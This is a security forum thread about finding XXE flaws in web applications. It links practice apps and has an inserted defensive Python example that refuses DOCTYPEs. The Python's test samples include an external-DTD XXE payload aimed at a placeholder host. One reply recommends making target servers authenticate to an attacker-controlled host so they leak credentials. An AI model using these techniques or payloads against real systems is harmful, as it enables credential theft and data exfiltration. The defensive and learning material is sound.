Hunting XXE For Fun And Profit

In one of our most recent “Advice from a Researcher” blogs Ben Sadeghipou wrote a great post on Hunting XXE for fun and profit.

https://blog.bugcrowd.com/advice-from-a-researcher-xxe/

This post talks about a type of critical vulnerability that can be found in web applications, the XML External Entity or as it is better known, XXE.

Please post any questions or comments here that you’d like the Bugcrowd team (including the author) to see.

Thanks!

2 Likes

For those just getting into XXE injection there are a few appsec learning apps for you to use to practice:

Mutillidae:

bWapp:

XMLmao:

Detectify’s XXE via RSS blog:

Happy hacking!

4 Likes

Some more resources from another forum user @jstnkndy :smile:

2 Likes

A couple of tweets on this the other day! Pro-Tips from some very skilled researchers:

2 Likes

Any XXE CTF link? Thank you.

1 Like

There are 3 practice apps listed above in a post of mine =)

1 Like

Just out of interest do any of these enable you to test “XSLT” injections?

I just want to chip in … if you are at the point where you can call external resources, I’d recommend pointing your external URL towards something configured to challenge for authentication (httpntlm/basic/smb); you’d be surprised how many servers cough up credentials.

… I wrote this about it for client/server abuse with authentication in folder paths; the material is kinda old, but that’s just because it would be rude of me to talk about where I have seen it recently … and my clients would kick my arse.

This stuff can be applied not just to XXE but to SSRF and any server fetching resources on your behalf/instruction.

And it can even be used to attack the client side… although more annoying than anything else (you’ll get a reward for it most of the time).

https://ctus.io/path-fu-external-authentication-injection/

1 Like
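The post above describes a server fetching resources at an attacker's direction (XXE, or SSRF more generally); the defensive counterpart is a parser that never resolves a DOCTYPE or external entity in the first place. As an added example (not from this thread or the linked blog), the following Python uses only the standard library expat parser to enforce that policy and runs it over constructed samples: a benign document, a parameter-entity payload in the %get / %dtd shape quoted in this thread (with a placeholder example.invalid host), an internal-only DTD, and a malformed document. The function names (safe_parse, verdict, triage) are assumptions of this example, not anything from the thread.

```python
"""Hardened XML parsing for untrusted input using only the Python standard library (expat)."""
import xml.parsers.expat as expat


class XmlRejected(ValueError):
    """Untrusted XML tried to declare a DOCTYPE, reference an external entity, or was malformed."""


def safe_parse(data: bytes) -> dict:
    """Parse untrusted XML; return {'root': <root element>, 'text': <concatenated character data>}.

    Policy: any DOCTYPE is refused the moment it appears, before a single entity
    (general or parameter, internal or SYSTEM) can be declared, and external entity
    references are refused outright. The parser therefore never fetches an
    attacker-chosen URL, local file or external DTD.
    """
    parser = expat.ParserCreate()
    # Never load parameter entities (the %get / %dtd kind) from an external DTD.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    result = {"root": None, "text": ""}

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise XmlRejected(f"DOCTYPE '{name}' is not allowed in untrusted input")

    def on_external_entity(context, base, system_id, public_id):
        return 0  # 0 tells expat to abort rather than resolve the reference

    def on_start(name, attrs):
        if result["root"] is None:
            result["root"] = name

    def on_chars(text):
        result["text"] += text

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = on_chars

    try:
        parser.Parse(data, True)
    except expat.ExpatError as exc:
        raise XmlRejected(f"malformed XML: {exc}") from exc
    return result


def verdict(data: bytes) -> str:
    """Classify one document as 'accepted' or 'rejected: <reason>' without raising."""
    try:
        safe_parse(data)
        return "accepted"
    except XmlRejected as exc:
        return f"rejected: {exc}"


# Constructed samples (not from the thread or the linked blog). The hostname is a
# reserved .invalid placeholder, so nothing here points at a real server.
SAMPLES = {
    "benign": b'<?xml version="1.0"?><order><id>42</id></order>',
    # Same shape as the parameter-entity payload quoted in this thread: an external
    # DTD is pulled in through %get and then %dtd is expanded from it.
    "external_dtd": (
        b'<?xml version="1.0" encoding="ISO-8859-1"?>'
        b'<!DOCTYPE testingxxe [<!ENTITY % get SYSTEM "http://example.invalid/x.dtd">'
        b'%get; %dtd;]><order/>'
    ),
    # Purely internal DTD, no network: still refused, because the policy is "no DOCTYPE",
    # which also shuts the door on entity-expansion (billion laughs) denial of service.
    "internal_dtd": b'<!DOCTYPE x [<!ENTITY a "b">]><x>&a;</x>',
    "malformed": b"<order><id>42</order>",
}


def triage(samples: dict) -> dict:
    """Run verdict() over a batch; reasons are dropped so the summary is easy to compare."""
    return {name: verdict(doc).split(":")[0] for name, doc in samples.items()}


if __name__ == "__main__":
    for name, doc in SAMPLES.items():
        print(f"{name:13s} {verdict(doc)}")
```

Rejecting the DOCTYPE itself (rather than only the SYSTEM entities inside it) is the simplest policy to reason about: it blocks the external-DTD and parameter-entity tricks described above, the file:// and http:// fetches that leak data or credentials, and entity-expansion denial of service, with one handler. Applications that genuinely need a DTD should validate against a fixed local schema instead of trusting one named in the request.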

Is the blog post formatting on the payload correct? This part in particular:

<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE testingxxe [

%get %dtd;]>

Seems like the closing tag bracket is missing: %get %dtd;]>

My editor says it’s missing, so I don’t know if it was meant like this or if it was a typo.

Can you advise please?

Thanks!!